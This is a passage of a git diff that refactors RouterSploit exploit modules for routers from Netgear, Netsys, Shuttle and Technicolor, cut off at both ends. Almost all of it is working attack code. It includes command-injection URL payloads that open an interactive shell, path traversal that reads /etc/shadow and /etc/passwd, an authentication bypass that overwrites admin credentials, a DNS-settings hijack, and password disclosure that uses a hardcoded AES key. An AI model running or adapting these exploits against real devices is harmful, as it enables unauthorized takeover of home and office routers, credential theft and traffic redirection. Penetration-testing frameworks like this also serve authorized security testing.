vulnerable") def execute(self, cmd): - url = ("{}:{}/{}?writeData=true®info=0&macAddress= " - "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd)) + path = ("/{}?writeData=true®info=0&macAddress= " + "001122334455 -c 0 ;{}; echo #".format(self.valid_resource, cmd)) # blind command injection - http_request(method="GET", url=url) + self.http_request( + method="GET", + path=path + ) return "" @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) for resource in self.resources: - url = ("{}:{}/{}?writeData=true®info=0&macAddress= " - "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd)) + path = ("/{}?writeData=true®info=0&macAddress= " + "001122334455 -c 0 ;{}; echo #".format(resource, cmd)) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/netgear/n300_auth_bypass.py b/routersploit/modules/exploits/routers/netgear/n300_auth_bypass.py index 998623b9c..ff6c1f5e3 100644 --- a/routersploit/modules/exploits/routers/netgear/n300_auth_bypass.py +++ b/routersploit/modules/exploits/routers/netgear/n300_auth_bypass.py @@ -1,45 +1,35 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netgear N300 Authentication Bypass vulnerability. - If the target is vulnerable link to bypass authentication will be provided" - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear N300 Auth Bypass', - 'description': 'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.', - 'authors': [ - 'Daniel Haake ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear N300 Auth Bypass", + "description": "Module exploits authentication bypass vulnerability in Netgear N300 devices. " + "It is possible to access administration panel without providing password.", + "authors": [ + "Daniel Haake ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt', - 'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html', + "references": [ + "https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt", + "http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html", ], - 'devices': [ - 'Netgear N300', - 'Netgear JNR1010v2', - 'Netgear JNR3000', - 'Netgear JWNR2000v5', - 'Netgear JWNR2010v5', - 'Netgear R3250', - 'Netgear WNR2020', - 'Netgear WNR614', - 'Netgear WNR618', + "devices": [ + "Netgear N300", + "Netgear JNR1010v2", + "Netgear JNR3000", + "Netgear JWNR2000v5", + "Netgear JWNR2010v5", + "Netgear R3250", + "Netgear WNR2020", + "Netgear WNR614", + "Netgear WNR618", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -51,23 +41,27 @@ def run(self): @mute def check(self): - url = "{}:{}/".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/", + ) if response is None: return False # target is not vulnerable # unauthorized if response.status_code == 401: - url = "{}:{}/BRS_netgear_success.html".format(self.target, self.port) - for _ in range(0, 3): - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/BRS_netgear_success.html", + ) if response is None: return False # target is not vulnerable - url = "{}:{}/".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/" + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/netgear/prosafe_rce.py b/routersploit/modules/exploits/routers/netgear/prosafe_rce.py index ad868b707..6d1bea397 100644 --- a/routersploit/modules/exploits/routers/netgear/prosafe_rce.py +++ b/routersploit/modules/exploits/routers/netgear/prosafe_rce.py @@ -1,69 +1,51 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - random_text, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netgear ProSafe WC9500, WC7600, WC7520 remote command execution vulnerability. - If the target is vulnerable command shell is invoked. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear ProSafe RCE', - 'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe' - 'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.', - 'authors': [ - 'Andrei Costin ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear ProSafe RCE", + "description": "Module exploits remote command execution vulnerability in Netgear ProSafe " + "WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.", + "authors": [ + "Andrei Costin ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://firmware.re/vulns/acsa-2015-002.php', - 'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf', + "references": [ + "http://firmware.re/vulns/acsa-2015-002.php", + "https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf", ], - 'devices': [ - 'Netgear ProSafe WC9500', - 'Netgear ProSafe WC7600', - 'Netgear ProSafe WC7520', + "devices": [ + "Netgear ProSafe WC9500", + "Netgear ProSafe WC7600", + "Netgear ProSafe WC7520", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - mark = random_text(32) - url = "{}:{}/login_handler.php".format(self.target, self.port) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} + mark = utils.random_text(32) + headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark) - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/login_handler.php", + headers=headers, + data=data + ) + if response is None: return "" @@ -78,7 +60,7 @@ def execute(self, cmd): @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py b/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py index 00e322d1a..08db09d40 100644 --- a/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py +++ b/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py @@ -1,47 +1,35 @@ -from routersploit import ( - exploits, - print_status, - print_success, - print_error, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear R7000 & R6400 RCE', - 'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is ' - 'vulnerable, command loop is invoked that allows executing commands on operating system level.', - 'authors': [ - 'Chad Dougherty', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear R7000 & R6400 RCE", + "description": "Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is " + "vulnerable, command loop is invoked that allows executing commands on operating system level.", + "authors": [ + "Chad Dougherty", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/', - 'https://www.exploit-db.com/exploits/40889/', - 'http://www.kb.cert.org/vuls/id/582384', + "references": [ + "http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/", + "https://www.exploit-db.com/exploits/40889/", + "http://www.kb.cert.org/vuls/id/582384", ], - 'devices': [ - 'R6400 (AC1750)', - 'R7000 Nighthawk (AC1900, AC2300)', - 'R7500 Nighthawk X4 (AC2350)', - 'R7800 Nighthawk X4S(AC2600)', - 'R8000 Nighthawk (AC3200)', - 'R8500 Nighthawk X8 (AC5300)', - 'R9000 Nighthawk X10 (AD7200)', + "devices": [ + "R6400 (AC1750)", + "R7000 Nighthawk (AC1900, AC2300)", + "R7500 Nighthawk X4 (AC2350)", + "R7800 Nighthawk X4S(AC2600)", + "R8000 Nighthawk (AC3200)", + "R8500 Nighthawk X8 (AC5300)", + "R9000 Nighthawk X10 (AD7200)", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -54,16 +42,20 @@ def run(self): def execute(self, cmd): cmd = cmd.replace(" ", "$IFS") - url = "{}:{}/cgi-bin/;{}".format(self.target, self.port, cmd) + path = "/cgi-bin/;{}".format(cmd) - http_request(method="GET", url=url) + self.http_request( + method="GET", + path=path + ) return "" @mute def check(self): - url = "{}:{}/".format(self.target, self.port) - - response = http_request(method="HEAD", url=url) + response = self.http_request( + method="HEAD", + path="/", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal.py b/routersploit/modules/exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal.py index c5bef04c7..7d2d705a6 100644 --- a/routersploit/modules/exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal.py +++ b/routersploit/modules/exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal.py @@ -1,50 +1,45 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netgear WNR500/WNR612v3/JNR1010/JNR2010 Path Traversal vulnerability. - If the target is vulnerable, content of the specified file is returned. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear WNR500/WNR612v3/JNR1010/JNR2010 Path Traversal', - 'description': 'Module exploits Netgear WNR500/WNR612v3/JNR1010/JNR2010 Path Traversal vulnerability which allows to read any file on the system.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear WNR500/WNR612v3/JNR1010/JNR2010 Path Traversal", + "description": "Module exploits Netgear WNR500/WNR612v3/JNR1010/JNR2010 Path Traversal " + "vulnerability which allows to read any file on the system.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/40737/', + "references": [ + "https://www.exploit-db.com/exploits/40737/", ], - 'devices': [ - 'Netgear WNR500', - 'Netgear WNR612v3', - 'Netgear JNR1010', - 'Netgear JNR2010' + "devices": [ + "Netgear WNR500", + "Netgear WNR612v3", + "Netgear JNR1010", + "Netgear JNR2010", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('admin', 'Username to log in') - password = exploits.Option('password', 'Password to log in') + username = OptString("admin", "Username to log in") + password = OptString("password", "Password to log in") - filename = exploits.Option('/etc/shadow', 'File to read') + filename = OptString("/etc/shadow", "File to read") def run(self): if self.check(): - url = "{}:{}/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa".format(self.target, self.port, self.filename) + path = "/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us" \ + "&var:language=en_us&var:page=BAS_bpa".format(self.filename) - response = http_request(method="GET", url=url, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path=path, + auth=(self.username, self.password) + ) if response is None: return @@ -58,13 +53,18 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa".format(self.target, self.port) + path = "/cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html" \ + "&var:language=en_us&var:language=en_us&var:page=BAS_bpa" - response = http_request(method="GET", url=url, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path=path, + auth=(self.username, self.password) + ) if response is None: return False # target is not vulnerable - if "root:" in response.text: + if utils.detect_file_content(response.text, "/etc/passwd"): return True # target vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/netsys/multi_rce.py b/routersploit/modules/exploits/routers/netsys/multi_rce.py index b4044304b..f6fa85780 100644 --- a/routersploit/modules/exploits/routers/netsys/multi_rce.py +++ b/routersploit/modules/exploits/routers/netsys/multi_rce.py @@ -1,46 +1,36 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - http_request, - mute, - validators, - random_text, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netsys multiple remote command execution vulnerabilities. - If the target is vulnerable it allows to execute commands on operating system level. - """ + +class Exploit(HTTPClient): __info__ = { - 'name': 'Netsys Multi RCE', - 'description': 'Exploits Netsys multiple remote command execution vulnerabilities that allows executing commands on operating system level', - 'authors': [ - 'admin ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netsys Multi RCE", + "description": "Exploits Netsys multiple remote command execution vulnerabilities that allows " + "executing commands on operating system level.", + "authors": [ + "admin ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://bbs.00wz.top/forum.php?mod=viewthread&tid=12630', + "references": [ + "http://bbs.00wz.top/forum.php?mod=viewthread&tid=12630", ], - 'devices': [ - 'Multiple Netsys', + "devices": [ + "Multiple Netsys", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(9090, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(9090, "Target HTTP port") - injections = ["/view/IPV6/ipv6networktool/traceroute/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}", - "/view/systemConfig/systemTool/ping/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}", - "/view/systemConfig/systemTool/traceRoute/traceroute.php?text_target=127.0.0.1&text_ageout=2&text_minttl=1&text_maxttl=1|{}"] + def __init__(self): + self.injections = [ + "/view/IPV6/ipv6networktool/traceroute/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}", + "/view/systemConfig/systemTool/ping/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}", + "/view/systemConfig/systemTool/traceRoute/traceroute.php?text_target=127.0.0.1&text_ageout=2&text_minttl=1&text_maxttl=1|{}" + ] - valid = None + self.valid = None def run(self): if self.check(): @@ -51,14 +41,15 @@ def run(self): print_error("Exploit failed - target seems to be not vulnerable") def execute(self, cmd): - marker = random_text(16) + marker = utils.random_text(16) cmd = cmd.replace(" ", "+") payload = "echo+{};{};echo+{};".format(marker, cmd, marker) - inj = self.valid.format(payload) - url = "{}:{}{}".format(self.target, self.port, inj) - - response = http_request(method="GET", url=url) + path = self.valid.format(payload) + response = self.http_request( + method="GET", + path=path + ) if response is None: return "" @@ -75,14 +66,16 @@ def check(self): cmd = "cat+/etc/passwd;" for injection in self.injections: - inj = injection.format(cmd) - url = "{}:{}{}".format(self.target, self.port, inj) + path = injection.format(cmd) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: continue - if "root:" in response.text: + if utils.detect_file_content(response.text, "/etc/passwd"): self.valid = injection return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/shuttle/915wm_dns_change.py b/routersploit/modules/exploits/routers/shuttle/915wm_dns_change.py index 5c92736f0..b513a0145 100644 --- a/routersploit/modules/exploits/routers/shuttle/915wm_dns_change.py +++ b/routersploit/modules/exploits/routers/shuttle/915wm_dns_change.py @@ -1,52 +1,43 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Shuttle Tech ADSL Modem-Router 915 WM DNS Change vulnerability. - If the target is vulnerable it possible to change dns settings" - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Shuttle 915 WM DNS Change', - 'description': 'Module exploits Shuttle Tech ADSL Modem-Router 915 WM dns change vulnerability.' - 'If the target is vulnerable it is possible to change dns settings.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Shuttle 915 WM DNS Change", + "description": "Module exploits Shuttle Tech ADSL Modem-Router 915 WM dns change vulnerability. " + "If the target is vulnerable it is possible to change dns settings.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/35995/', - 'https://github.com/jh00nbr/Routerhunter-2.0', + "references": [ + "https://www.exploit-db.com/exploits/35995/", + "https://github.com/jh00nbr/Routerhunter-2.0", ], - 'devices': [ - 'Shuttle Tech ADSL Modem-Router 915 WM', + "devices": [ + "Shuttle Tech ADSL Modem-Router 915 WM", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server') - dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + dns1 = OptString('8.8.8.8', 'Primary DNS Server') + dns2 = OptString('8.8.4.4', 'Seconary DNS Server') def run(self): - url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1".format(self.target, - self.port, - self.dns1, - self.dns2) + path = "/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1".format(self.dns1, + self.dns2) print_status("Attempting to change DNS settings...") print_status("Primary DNS: {}".format(self.dns1)) print_status("Secondary DNS: {}".format(self.dns2)) - response = http_request(method="POST", url=url) + response = self.http_request( + method="POST", + path=path + ) if response is None: return diff --git a/routersploit/modules/exploits/routers/technicolor/dwg855_authbypass.py b/routersploit/modules/exploits/routers/technicolor/dwg855_authbypass.py index 079accd7c..7c8182f75 100644 --- a/routersploit/modules/exploits/routers/technicolor/dwg855_authbypass.py +++ b/routersploit/modules/exploits/routers/technicolor/dwg855_authbypass.py @@ -1,59 +1,62 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - sanitize_url, - http_request, - mute, - validators -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability. - If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Technicolor DWG-855 Auth Bypass', - 'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.', - 'authors': [ - 'JPaulMora ', # vulnerability discovery, initial routersploit module. - '0BuRner', # routersploit module + "name": "Technicolor DWG-855 Auth Bypass", + "description": "Module exploits Technicolor DWG-855 Authentication Bypass " + "vulnerability which allows changing administrator's password.\n\n" + "NOTE: This module will errase previous credentials, this is NOT stealthy.", + "authors": [ + "JPaulMora ", # vulnerability discovery, initial routersploit module. + "0BuRner", # routersploit module ], - 'references': [ - 'Bug discovered some time before Aug 2016, this is the first reference to it!\n This exploit works with any POST parameter, but changing admin creds gives you access to everything else.', + "references": [ + "Bug discovered some time before Aug 2016, this is the first reference to it!\n" + "This exploit works with any POST parameter, but " + "changing admin creds gives you access to everything else.", ], - 'devices': [ - 'Technicolor DWG-855', + "devices": [ + "Technicolor DWG-855", ] } - target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - nuser = exploits.Option('ruser', 'New user (overwrites existing user)') - npass = exploits.Option('rpass', 'New password (overwrites existing password)') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself! - vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg" + nuser = OptString("ruser", "New user (overwrites existing user)") + npass = OptString("rpass", "New password (overwrites existing password)") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass) - url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} - data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"} + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + data = { + "HttpUserId": self.nuser, + "Password": self.npass, + "PasswordReEnter": self.npass, + "RestoreFactoryNo": "0x00" + } - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/goform/RgSecurity", + headers=headers, + data=data + ) if response is None: print_error("Target did not answer request.") elif response.status_code == 401: - # Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds. - infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port)) - check_response = http_request(method="GET", url=infotab_url, auth=(self.nuser, self.npass)) + # Server obeys request but then sends unauthorized response. + # Here we send a GET request with the new creds. + check_response = self.http_request( + method="GET", + path="/RgSwInfo.asp", + auth=(self.nuser, self.npass) + ) if check_response.status_code == 200: print_success("Credentials changed!") @@ -68,10 +71,16 @@ def run(self): @mute def check(self): - url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port)) - response = http_request(method="GET", url=url, auth=("", "")) - # print response.text.encode('utf-8') - if response is not None and self.vulnresp in response.text.encode('utf-8'): + # The check consists in trying to access router resources + # with incorrect creds. in this case logo.jpg Try it yourself! + vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg" + + response = self.http_request( + method="GET", + path="/logo.jpg", + auth=("", "") + ) + if response is not None and vulnresp in response.text: return True else: return False diff --git a/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure.py b/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure.py index 5338395af..b8a50167f 100644 --- a/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure.py +++ b/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure.py @@ -1,42 +1,32 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - print_status, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Technicolor TC7200 password disclosure vulnerability. - If the target is vulnerable, it allows read credentials for administration user. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Technicolor TC7200 Password Disclosure', - 'description': 'Module exploits Technicolor TC7200 password disclosure vulnerability which allows fetching administration\'s password.', - 'authors': [ - 'Jeroen - IT Nerdbox', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Technicolor TC7200 Password Disclosure", + "description": "Module exploits Technicolor TC7200 password disclosure vulnerability " + "which allows fetching administration's password.", + "authors": [ + "Jeroen - IT Nerdbox", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/31894/', + "references": [ + "https://www.exploit-db.com/exploits/31894/", ], - 'devices': [ - 'Technicolor TC7200', + "devices": [ + "Technicolor TC7200", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/goform/system/GatewaySettings.bin", + ) if response is None: return @@ -49,13 +39,14 @@ def run(self): @mute def check(self): - url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/goform/system/GatewaySettings.bin" + ) if response is None: return False # target is not vulnerable if response.status_code == 200 and "0MLog" in response.text: return True # target is vulnerable - else: - return False # target is not vulnerable + + return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py b/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py index 28ded391f..c0cf6ec0c 100644 --- a/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py +++ b/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py @@ -1,48 +1,39 @@ import binascii import struct from Crypto.Cipher import AES +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Technicolor TC7200 password disclosure vulnerability. - If the target is vulnerable, it allows read credentials for administration user. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Technicolor TC7200 Password Disclosure', - 'description': 'Module exploits Technicolor TC7200 password disclosure vulnerability which allows fetching administration\'s password.', - 'authors': [ - 'Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)', # vulnerability discovery - '0BuRner', # routersploit module + "name": "Technicolor TC7200 Password Disclosure V2", + "description": "Module exploits Technicolor TC7200 password disclosure vulnerability which " + "allows fetching administration's password.", + "authors": [ + "Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)", # vulnerability discovery + "0BuRner", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/40157/', - 'http://www.search-lab.hu/advisories/secadv-20160720' + "references": [ + "https://www.exploit-db.com/exploits/40157/", + "http://www.search-lab.hu/advisories/secadv-20160720", ], - 'devices': [ - 'Technicolor TC7200', + "devices": [ + "Technicolor TC7200", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") - - url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/goform/system/GatewaySettings.bin", + ) + return None if response is not None and response.status_code == 200 and "MLog" in response.text: print_status("Reading GatewaySettings.bin...") @@ -71,16 +62,17 @@ def parse_backup(backup): @staticmethod def decrypt_backup(backup): key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F') - length = (len(backup) / 16) * 16 - cipher = AES.new(key, AES.MODE_ECB, '\x00' * 16) - plain = cipher.decrypt(backup[0:length]) + l = (len(backup) / 16) * 16 + cipher = AES.new(key, AES.MODE_ECB, b'\x00' * 16) + plain = cipher.decrypt(backup[0:l]) return plain @mute def check(self): - url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/goform/system/GatewaySettings.bin", + ) if response is not None and response.status_code == 200 and "MLog" in response.text: return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py b/routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py index dc9ec40d5..d1b173a39 100644 --- a/routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py +++ b/routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py @@ -1,45 +1,31 @@ -import socket -import telnetlib import re -import ftplib from StringIO import StringIO +from routersploit.core.exploit import * +from routersploit.core.ftp.ftp_client import FTPClient +from routersploit.core.telnet.telnet_client import TelnetClient -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - print_info, - mute, - validators, - print_table, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Technicolor TG784n-v3 auth bypass vulnerability. - If the target is vulnerable, it allows to bypass authentication. - """ + +class Exploit(FTPClient, TelnetClient): __info__ = { - 'name': 'Technicolor TG784n-v3 Auth Bypass', - 'description': 'Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.', - 'authors': [ - 'Jose Moreira', # vulnerability discovery & analysis - '0BuRner', # routersploit module - 'Marcin Bury ', # little fixes + "name": "Technicolor TG784n-v3 Auth Bypass", + "description": "Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.", + "authors": [ + "Jose Moreira", # vulnerability discovery & analysis + "0BuRner", # routersploit module + "Marcin Bury ", # little fixes ], - 'references': [ - 